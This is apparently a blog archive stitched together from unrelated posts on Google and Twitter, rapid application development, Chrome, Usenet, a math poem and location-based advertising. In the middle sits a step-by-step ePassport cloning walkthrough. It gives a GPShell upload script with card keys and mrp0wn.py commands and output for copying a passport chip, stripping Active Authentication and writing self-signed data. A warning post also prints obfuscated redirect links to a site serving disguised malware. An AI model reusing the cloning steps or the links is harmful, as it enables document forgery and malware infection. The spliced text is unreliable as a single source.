What? Is shadi going crazy? Hear me out. Think back when YouTube was growing like a weed, and Google snapped it up. Most people (including me) saw this as Google “getting into the video business,” and sure, that in fact was one part of the equation. But as we all know, making money from consumer driven video ain’t a cakewalk, and hosting that video is really, really expensive. So why did Google really buy YouTube? My answer, which of course looks brilliant given it’s 20/20 hindsight: YouTube was a massive search asset.

Afterall, YouTube now gets more searches than Yahoo, Google’s closest search rival.

So think about that. YouTube was the single fastest growing new form of search on the Web, and Google pretty much outflanked (and outspent) everyone to buy it. Not to get into video monetization, per se, but to harvest and control the most important emerging form of search. In short, Google could not afford to NOT own YouTube.

So, fast forward to today. What’s the most important and quickly growing form of search on the web today? Real time, conversational search. And who’s the YouTube of real time search? Yep. Twitter. It’s an asset Google cannot afford to not own, and also, one they most likely do not have the ability (or brand permission) to build on their own. (Remember, Google tried to build its own YouTube – Google Video – and it failed to get traction. A service like Twitter is community driven, and Google has never been really great at that part of the media business).

Google’s search engine is so dominant that it’s hard to imagine how anyone could knock the Mountain View company from its pedestal. And yet if history is any guide, such reigns never last. IBM gave way to Microsoft, which now has been usurped by Google.

It could be a shift in technology. It could be a more nimble, innovative rival. But something always comes along and turns things upside-down, often emerging from a direction so surprising that the incumbent never sees it coming until it’s too late.

In this case, it’s hard to imagine a company that might post a more surprising threat to Google than Twitter. But just this scenario is suddenly generating some heated discussions around the Web.

Granted, it sounds absurd to think that the San Francisco-based microblogging service, which famously has no revenue, could so much as induce one single bead of sweat on the forehead of even the lowliest of Google engineers. And some of the headlines topping such discussions (“Is Twitter the Google Killer?”) are a bit of blogosphere hyperbole.

Even after raising another $35 million in venture capital earlier this month, it remains entirely unclear whether Twitter has any answer to the persistent questions about what its business model may be. Meanwhile, Google’s powerful search and text-based advertising combination has given it a license to print money.

But the fact that Twitter’s potential to disrupt the search market is being seriously discussed shows just how quickly the sands can shift under the feet of even a colossus like Google.

Very quietly, one of Twitter’s most powerful applications has become its ability to allow people to conduct real-time searches.

In fact, the motto posted on Twitter’s search page (http://search.twitter.com) says, “See what’s happening — right now.” And many people do exactly that. During a live event or amid breaking news, a growing number of people are turning to Twitter search to follow the conversations among its users.

How much the behavior is growing is hard to say, since Twitter is privately held and doesn’t release such figures. But the company thought enough of its potential to acquire a small New York company called Summize, a group of five engineers, which had built the Twitter search technology. Summize’s site was folded into Twitter last summer.

I’ve used Summize, and now Twitter search, on almost a daily basis over the past year, without even really thinking about how much I relied on it. It was only some recent, random conversations back in January that crystallized how important Twitter search had become to me — and to Twitter itself.

For instance, search could point to a solution to Twitter’s business model problem. In public, founder Ev Williams has dropped hints that the company is trying to find interesting ways to mine its treasure trove of data to create some kind of services that might be valuable enough to entice businesses to actually pay to use them.

Certainly Google has shown that search data can be a powerhouse when linked to related advertising. So perhaps Twitter search will allow that company to produce some new kind of advertising that is more immediate and time-sensitive, related to products people might need RIGHT NOW!

We’ll see. The emergence of real-time search also certainly says a lot about us, and how our increasingly wired society is becoming ever more hyperkinetic. In this world, compared with Twitter, Google suddenly begins to feel old and plodding. Its search results might be minutes, hours, or even days old. Yawn!

Typically, when such goliaths are slain, it’s because they failed to recognize the threat and make the necessary changes until it was too late. So, it’ll be interesting to see how Google — or even if Google — feels the need to throw some kind of counterpunch. In theory, Google has created a culture to keep it flexible and innovative. On the other hand, its track record of new products has been a bit lackluster.

There’s always the chance, of course, that Google will quickly deploy real-time search and simply crush Twitter. But that’s harder than it sounds. Twitter already has an estimated 6 million users and is growing rapidly. It would be hard to convince someone to switch to a new microblogging service at this point, and it might be just as tough to get users to search Twitter through Google when they can just do it through Twitter itself.

It might be tempting for Google to try to take some of those billions of dollars stuffed in its mattress and overwhelm Twitter and its investors with an offer that dwarfs the reported $500 million Facebook offered for the company. But such a move could also attract a healthy once-over from antitrust regulators. Then again, I wonder how buying a zero-revenue company factors into antitrust rules.

But no matter how this unfolds, it’s a good reminder that nobody in Silicon Valley remains invincible forever.

The manipulated information is displayed without any alarms going off.
The exploitation of this loophole is trivial and can be verified using
thc-epassport.

Regardless how good the intention of the government might have been, the
facts are that tested implementations of the ePassports Inspection System
are not secure.

ePassports give us a false sense of security: We are made to believe
that they make usemore secure. I’m afraid that’s not true: current
ePassport implementations don’t add security at all.

Thanks to Elv1s for beta testing!

Just follow two easy steps:

(1) Upload the emulator code to a blank JCOP v4.1 72k smart card
Use your favorite tool to upload the CAP file. As an example GPShell is
used. The script used to upload the CAP file:

P:\GPShell-1.4.2>type epassport.script
mode_211
enable_trace
establish_context
card_connect -readerNumber 3
select -AID a000000003000000
open_sc -security 1 -keyind 0 -keyver 0 -mac_key 404142434445464748494a4b4c4d4e4
f -enc_key 404142434445464748494a4b4c4d4e4f
delete -AID A0000002471001
delete -AID A00000024710
install -file epassport.cap -priv 00 -AID A0000002471001 -pkgAID A00000024710
card_disconnect
release_context

A sample output of an actual upload:

P:\GPShell-1.4.2>GPShell.exe epassport.script
mode_211
enable_trace
establish_context
card_connect -readerNumber 3
* reader name OMNIKEY CardMan 5x21-CL 0
select -AID a000000003000000
Command --> 00A4040008A000000003000000
Wrapped command --> 00A4040008A000000003000000
Response <-- 6F108408A000000003000000A5049F6501FF9000
..
..
..
Wrapped command --> 84E60C002506A0000002471007A000000247100107A00000024710010100
02C90000B918E8E43A25117700
Response <-- 9000
card_disconnect
release_context

The CAP file currently supports the following files:
* EF.COM : 256 bytes (required file)
* EF.SOD : 2560 bytes (required file)
* EF.DG1 : 128 bytes (required file)
* EF.DG2 : 24576 bytes (required file)
* EF.DG3 : 20480 bytes (optional, future use)
* EF.DG11: 128 bytes (optional, e.g. USA)
* EF.DG12: 128 bytes (optional, e.g. USA)
* EF.DG13: 64 bytes (optional, e.g. Japan)
* EF.DG15: 256 bytes (optional, e.g. The Netherlands)

If you need support of other DGs, please let vonJeek know.

(2a) Clone the chipUsing a customized THC version of Adam Laurie’s RFIDIOt tools, you’re able
to read a chip’s content and to write it to an emulator.

P:\RFIDIOt-vonjeek>mrp0wn.py CLONE M3V0NJ33K000000999999

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek  =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Put a ePassport near the terminal and press enter to continue...
Reading document using KEY M3V0NJ33K000000999999, please be patient...
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.
Done, happy mrp0wning  

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

If your chip is protected using the optional Active Authentication mechanism,
the Active Authentication data group (DG15, tag 0×6F) is removed from EF.COM
as demonstrated by Jeroen van Beek at the 2008 USA BlackHat Briefings. Note
that mrp0wn.py’s parameter ‘STRIP_AA’ must be set to the value ‘True’. This
attack will work on all inspection system implementations that are using e.g.

ICAO’s “worked examples”, see this site for more info on that.

(2b) Write saved data

It’s also possible to write chip data you’ve saved earlier using RFIDIOt’s

mrpkey.py. As an example you can use vonJeek’s ePassport data. Note that

this data is self-signed: vonJeek started his own country

P:\tmp>unzip vonjeek-epassport_dump.zip

Archive:  vonjeek-epassport_dump.zip
 extracting: EF_COM.BIN
  inflating: EF_DG2.BIN
  inflating: EF_DG1.BIN
 extracting: EF_SOD.BIN	

P:\>cd \RFIDIOt-vonjeek	

P:\RFIDIOt-vonjeek>mrp0wn.py WRITE /tmp

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek  =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Document type is PASSPORT.
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.
Done, happy mrp0wning  

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

You can also alter data before writing it to an emulator chip. If you want
to do that: this document contains details about – amongst others – DG1 and
DG2 encoding. If you’ve updated the DGs you can sign them using Peter
Gutmann’s CryptLib.

A read-out of vonJeek’s ePassport chip using the reference implementationnamed Golden Reader Tool can be seen below.

If you’re interested in ePassport related PKI (how to verify whether chip
content is signed by a bonafide authority?) please check the following URLs:

* http://www2.icao.int/en/MRTD/Pages/icaoPKD.aspx
* http://www.icao.int/icao/en/atb/meetings/2008/TagMRTD18/TagMrtd18_ip04.pdf
* http://www.csca-si.gov.si/TR-PKI_mrtds_ICC_read-only_access_v1_1.pdf
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467106.ece
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467098.ece

Overview

The purpose of rapid application development is to build applications in short timescales by with the compromise of usability, features and/or speed of execution. In current times rapid application development has become a term that describes applications that can be designed and developed within 60-90 days.  Although this was not the original description, as it was originally intended to describe processes of development that involved application prototyping and iterative development.

History

Rapid application development has been around for approximately 20 years, but it remains as valid today as when it was initially conceived.

The problem that existed

In the early 1970’s such process as the Waterfall development methodology often resulted in applications developed that did not meet the clients requirements. This was due to the fact that applications took far too long to be completed that by the time they were the clients’ requirements had changed. Thus, for large projects the methods resulted in complete projects that were unfortunately unusable.

When investigated it was found that the reason this occurred was the strict adherence to the completion of each development lifecycle stage before continuing to the next stage.  The problem occurred when business requirements were based on a list frozen at a point in time, thus the longer the development phase the more likely that the business requirements have changed and potentially invalidated the original targets that the system was based on.

The solution rapid application development provided

There were many potential resolutions to the problem provided in the 1980;s and through to the current day.  Back in 1986 Barry Boehm wrote a book titles A Spiral Model of Software Development and Enhancement. This book initially outlines the basic concepts of prototyping and iterative development with a focus on risk reduction.  Also during 80’s, Scott Shultz and James Martin further refined the ideas of prototyping and iterative development into a new methodology named Rapid Iterative Production Prototyping (RIPP).  The main focus of RIPP was the development of systems in a rapid time frame using small teams of highly qualified, motivated and experienced staff. James Martin (Often referred to as “the Guru of the Information Age” and was also nominated for the Pulitzer prize) then expanded on the method and formalised RIPP.  He published the book Rapid Application Development.

The Advantages and Disadvantages of RAD

The main advantages of Rapid Application Development are speed and quality, where potentially the disadvantages are potentially the reduction in scalability and features.

Increased Speed

The name of the method, Rapid Application Development, strongly suggests the main advantage, speed. The main advantage lies in the in increased development speed, and the decreased time that is required for delivery.  To achieve this goal of speedy application delivery is addressed with the use of Computer Aided Software Engineering otherwise known as CASE Tools.  These focus on decreasing the time required in converting project requirements into code. Another element used is Time Boxing, in which various extra features are pushed out to future released in order to complete a feature light version quickly.

Increased Quality

Increased quality is a primary focus of the Rapid Application Development methodology, but the term has a different meaning than is traditionally associated with Custom Application Development. Prior to RAD, and perhaps more intuitively, quality in development was both the degree to which an application conforms to specifications and a lack of defects once the application is delivered. According to RAD, quality is defined as both the degree to which a delivered application meets the needs of users as well as the degree to which a delivered system has low maintenance costs. Rapid Application Development attempts to deliver on quality through the heavy involving of users in the analysis and particularly the design stages.

Reduced Scalability

Because RAD focuses on development of a prototype that is iteratively developed into a full system, the delivered solution may lack the scalability of a solution that was designed as a full application from the start.

Reduced Features

Due to time boxing, where features are pushed off to later versions in favour of delivering an application in a short time frame, RAD may produce applications that are less full featured than traditionally developed applications. This concern should be addressed as soon as possible through clear communication with the client as to what will be delivered and when.

http://google.com/search?hl=en&q=easyautoskola&btnI=0&/?a=F0F2EFE6E9ECE5AEE1EBAEE6E1E3E5E2EFEFEBAEE3EFED

AFF6B2B2B3AFB1B7B0B2AFB3B6AFF1B5B6B1B8B0B5B1B8B2DFB6B3B1B7AEEAF0E7&b=C1EEE4F2E5F7A0C3F2EFEFEBF3

http://google.mu/search?hl=en&q=sbestfood&btnI=1187250

The first link seems to have been taken down by the ISP but the second is still alive, and it takes you to the site:

http://www.sbestfood.com/video/fb/

This is a social networking attack, when someone opens the site, they are prompted to download a file called codecsetup.exe this is prompted to the user on every link on the site, do not download or run this file! The current purpose of the virus is to continue to distribute it self, it will most likely attempt to convert your computer into a “zombie” at the attackers will to help out with online attacks such as DDoS (Distributed Denial of Service).

As of this moment, none of the major virus companies have identifies this file as a virus, so becarefull and do not assume that you are safe because your anti-virus is not warning you!

Today brings news that the rumors were apparently premature, not wrong: Google Blogoscoped has published an amazing comic book by Understanding Comics’ Scott McCloud introducing Chrome, Google’s browser. The Google Blog says that Chrome will be available for download tomorrow; it’s Windows-only at the moment, but Mac and Linux versions are in the works.)

Earlier rumors of a “Gbrowser” had it as being based on Mozilla, as Firefox is, but the comic book says that Chrome is built on top of Webkit, the browser platform that also serves as the basis for Apple’s Safari. Chrome has a highly tab-centric user interface, advanced memory management to prevent the browser from getting bogged down as you open up tabs, a fast JavaScript virtual machine, sandboxing to prevent malware from doing damage to your PC, built-in Gears for offline applications, a framework for plug ins, and more. I’ve never tried to judge a software product by assessing a comic book about it before, but it’s clear that Chrome is an ambitious attempt to launch a truly new Web browser–not a rebranded version of Mozilla or a me-too clone of anything else that’s out there.

It all leaves me with about a gazillion questions. Here, for starters, are ten of them:

1. Will Google stop promoting Firefox? It’s been known to use the Google homepage to tell IE users they should be running Firefox, and it distributes a version of Firefox with the Google Toolbar built in. You gotta think that it’ll redeploy some or all of its Firefox-boosting energies to drumming up interest in Chrome.

2. Will Mozilla decide Google is an enemy, not a friend? Probably not–as Kara notes, the companies recently extended the relationship that makes puts Google into Firefox as its default search engine until 2011. That deal makes Mozilla millions of dollars a year, which is presumably enough to make Google at worst a frenemy of Mozilla. It’s hard–although not impossible–to imagine Mozilla being so ticked off by Google launching a browser that it takes its search business to someone else, such as Yahoo.

3. Did Google tell Mozilla it was working on a browser? Out of courtesy, or to ensure that the Firefox deal, which makes millions for Google as well as for Mozilla, emerged unscathed? Or did Mozilla renew the partnership not knowing that Google was planning to become a competitor? In the great scheme of things, it’s no surprise that Google might want to build a browser, but conventional wisdom would likely have involved it being based on Mozilla, not Webkit.

4. Just how hard will Google push Chrome on the Google homepage? Like no other company on earth, Google has an opportunity to get hundreds of millions of people using its browser in a relatively short amount of time. You gotta think that it’ll use the Google homepage to drum up interest. But will it check to see if you’re using IE, Firefox, or another browser and attempt to convince you to switch?

5. Will Google try to convert Google Toolbar users into Chrome users? Toolbar is presumably Google’s most widely-used piece of software at the moment, and it seems inevitable that Google will want to let users know about Chrome. But will it, say, try to bundle Chrome into the Toolbar download from now on? Apple discovered that bundling is dangerous when it caught flack for distributing Safari for Windows via the iTunes updater.

6. How deeply will Chrome be integrated with other Google projects? It’ll include Gears. Will it tie into Google Maps and Google Print and Google Desktop and the 18,432,922 other Google projects in ways that a non-Google browser wouldn’t?

7. Or to put that last question another way, will Google services work better in Chrome than other browsers? A conspiracy theorist could easily come up with scenarios in which Google starts to tie together its offerings in ways that resemble the tactics that Microsoft used in the 1990s to drive IE adoption and discourage use of Netscape. Google is too smart and too well intentioned to go down that route in the same way, I’m sure. But even a company with good intentions might do things that reasonable people (or even the courts think are anti-competitive.

8. Just how popular could Chrome get? Can it get to ten percent marketshare? Twenty? Forty? Ninety? Firefox has shown that it’s possible for a good new browser to gain plenty of traction, and Chrome will have advantages that even Firefox doesn’t have in terms of distribution.

9. Who will it steal users from? Kara says that Chrome is at least a part a response to Google concerns that IE 8 may be bad for Google’s search-and-advertising business. So the company would presumably be pleased if IE users jump ship for Chrome. But if you can divide the world into folks who will switch to a better browser and those who won’t, a high percentage of the former group has likely already moved to Firefox. You can imagine a scenario in which the arrival of Chrome results in Firefox’s marketshare gains stalling. Or even in Firefox use eroding.

10. Will Chrome stay on the desktop? Google sees its future as being highly mobile, as witness its work on Android and all the work it’s put into making services like Gmail and Google Maps work well on iPhone, Windows Mobile, BlackBerry, and other mobile platforms. Will we see Chrome on phones?

I could go on–but for now, I’ll stop my pondering.  Needless to say, I can’t wait to try Chrome, as it becomes real and imminent…

In a way inconceivable in today’s Web-fragmented marketplace, Usenet was where you went to talk. Conceived back in the idealistic, non-profit days of the Internet, it was—well, it is, but it mostly was—a series of bulletin boards called “newsgroups” shared by thousands of computers, which traded new messages several times a day.

On the text-only Usenet of my memory, nobody knew whether you were a dog, or a kid, or Finnish—only what you wrote. There wasn’t the obsession with photos and video that overruns today’s social networking sites. Yeah, I know that sounds like “get off my lawn you darn kids” crotchetiness, but there’s something really nice about just talking to people and not caring what they look like.

Serious conversations went on in forums like comp.sys.atari.8bit; more frivolous chatter appeared in groups whose names started with “alt,” a freewheeling free-for-all that nobody owned, nobody managed, and nobody policed. It was a more innocent time on the Net, before most of the spammers, the crooks, or even the general public showed up. People hewed to a loosely agreed-upon set of net.manners enforced by self-appointed cops. The society worked—at least for a while.

Usenet was what the Web is missing nowadays: a genuinely public space, with unclear ownership. While different people hung out in different groups, everyone accessed the same group list and there was plenty of cross-fertilization. Control came down to a bickering cabal of scattered IT administrators who generally preferred to leave well enough alone. Compared to chat systems like IRC (and later, instant messaging and texting), Usenet encouraged thoughtful, long-form writing with lots of quotation and back-and-forth.

Usenet has been dying for years, of course. Some people date Usenet’s decline as early as 1993, when millions of AOL users dropped into what was previously a geek paradise. As the ’90s went on, the eye candy of the Web and the marketing dollars of Web site owners helped push people over to profit-making sites. Usenet’s slightly arcane access methods and text-only protocols have nothing on the glitz and glamour of MySpace.

The Web also gave Usenet a new life through the mid-90s as a searchable database of questions and answers, via DejaNews and Google. But searchability also killed off some of Usenet’s social functions. More chaotic and ad-hoc groups functioned through a sort of security in obscurity; as long as nobody bothered to click on them, nobody would know what people were talking about. With Google Groups, every word you wrote became enshrined and eternally searchable.

Meanwhile, as multimedia became popular over the past ten years, Usenet started to become a way for pirates and pornographers to distribute massive quantities of binary files in a decentralized, untraceable manner; in other words, it became a proto-BitTorrent. That was likely when Usenet became truly doomed. Newsgroups had exchanged code along with text for years, but by the late ’90s the “binaries” groups began taking up huge amounts of space and Net traffic, and since Usenet libraries reside on each ISP’s server, service providers sensibly started to wonder why they should be reserving big chunks of their own disk space for pirated movies and repetitive porn.

It’s the porn that’s putting nails in Usenet’s coffin. AOL dropped Usenet in 2005, but many other large ISPs kept carrying newsgroups. Now major providers are dropping the full alt. hierarchy, and even Usenet entirely, as part of a New York State government crusade against child pornographers who’ve been using the alt.binaries groups to distribute their wares. Dropping all of Usenet to lose alt.binaries.videos.of.criminal.acts is definitely throwing the baby out with the bathwater, but at the same time I don’t have much pity for the binaries crowd. Usenet is a hideously inefficient way to distribute binary file—you end up making thousands of unused copies on various servers and encoding your files in inefficient ways. And way too much of the binaries traffic consists of piracy and warez.

It’s hard to completely kill off something as totally decentralized as Usenet; as long as two servers agree to share the NNTP protocol, it’ll continue on in some fashion. But the Usenet I mourn is long gone, anyway, or long-transformed into interlocking comments on LiveJournals and the forums boards on tech-support Web sites. Obviously, people lead lives, converse, and learn on the Internet far more broadly than they did in 1993. But give me a moment’s nostalgia for a Net that had one place to go, that everybody knew about, but nobody owned.

The three is all that’s good and right,
Why must my three keep out of sight
Beneath the vicious square root sign,
I wish instead I were a nine

For nine could thwart this evil trick,
with just some quick arithmetic

I know I’ll never see the sun, as 1.7321
Such is my reality, a sad irrationality

When hark! What is this I see,
Another square root of a three

As quietly co-waltzing by,
Together now we multiply
To form a number we prefer,
Rejoicing as an integer

We break free from our mortal bonds
With the wave of magic wands

Our square root signs become unglued
Your love for me has been renewed

Credit to the film “Harold & Kumar – Escape from Guantanamo Bay”

This got me thinking about the wealth of information that social networks currently hold on a particular user to enable them to fine tune advertising related to them, now if you were able to add the functionality of GPS and the system was able to calculate where the user is, thus when someone is within the vicinity of a shop, (for example borders the book store), using the applications installed on the iphone (such as the facebook app), Borders could potentially advertise to a customer who loves books, has a certain liking for a particular author.  This information can allow the shops to provide an incentive through the social network for the user to come in to the store.

This could potentially have privacy implications, but i’m sure there are ways to make this functionality potentially very friendly both for the consumer and business.

Rather than simply spamming anyone that comes past using bluetooth as has been done in the past, this can be a very targetted means of advertising for the shops for someone who is within easy reach of their store.